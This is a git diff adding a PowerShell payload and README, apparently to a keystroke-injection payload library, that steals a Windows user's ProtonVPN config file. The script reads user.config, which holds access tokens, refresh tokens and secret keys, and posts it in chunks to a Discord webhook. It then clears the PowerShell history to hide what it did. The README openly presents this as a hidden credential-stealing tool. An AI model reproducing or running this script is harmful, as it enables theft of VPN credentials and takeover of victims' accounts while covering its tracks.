diff --git a/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 new file mode 100644 index 0000000..a36a30f --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 @@ -0,0 +1,37 @@ +$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config" + +$Content = Get-Content -Path $Path + +$text = $Path + $Content + +# Discord Connection +$hookurl = "$discord" + +# Loop for Discord +$ConstantLimitForRestMethod = 1999 +$TMP_Body = @{ + 'username' = $env:username + 'content' = "" +} + for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){ + try { + $TMP_Body = @{ + 'username' = $env:username + 'content' = $text.Substring($i, $ConstantLimitForRestMethod) + } + } catch [ArgumentOutOfRangeException] { + if($text.Length-$i -gt 0){ + $TMP_Body = @{ + 'username' = $env:username + 'content' = $text.Substring($i, $text.Length-$i) + } + } else { + break + } + } + Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json) +} + + +# Clear the PowerShell command history +Clear-History \ No newline at end of file diff --git a/payloads/library/exfiltration/ProtonVPN-config/README.md b/payloads/library/exfiltration/ProtonVPN-config/README.md new file mode 100644 index 0000000..dba980d --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/README.md @@ -0,0 +1,37 @@ +# ProtonVPN config file ✅ + +A script used to stole target ProtonVPN config file. + +**Category**: Credentials, Exfiltration + +## Description + +This script will stole target ProtonVPN config file. + +Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +In the config file you can find a lot information about the user like: +- UserUid +- UserAccessToken +- UserRefreshToken +- UserAuthenticationPublicKey +- UserAuthenticationSecretKey +- UserAuthenticationCertificatePem +- UserCertificationServerPublicKey +- and so on... + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* ProtonVPN user logged at least one time +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke Get-Content for get in plaintext the ProtonVPN .config content +* Invoke-WebRequest will be entered in the Run Box to send the content +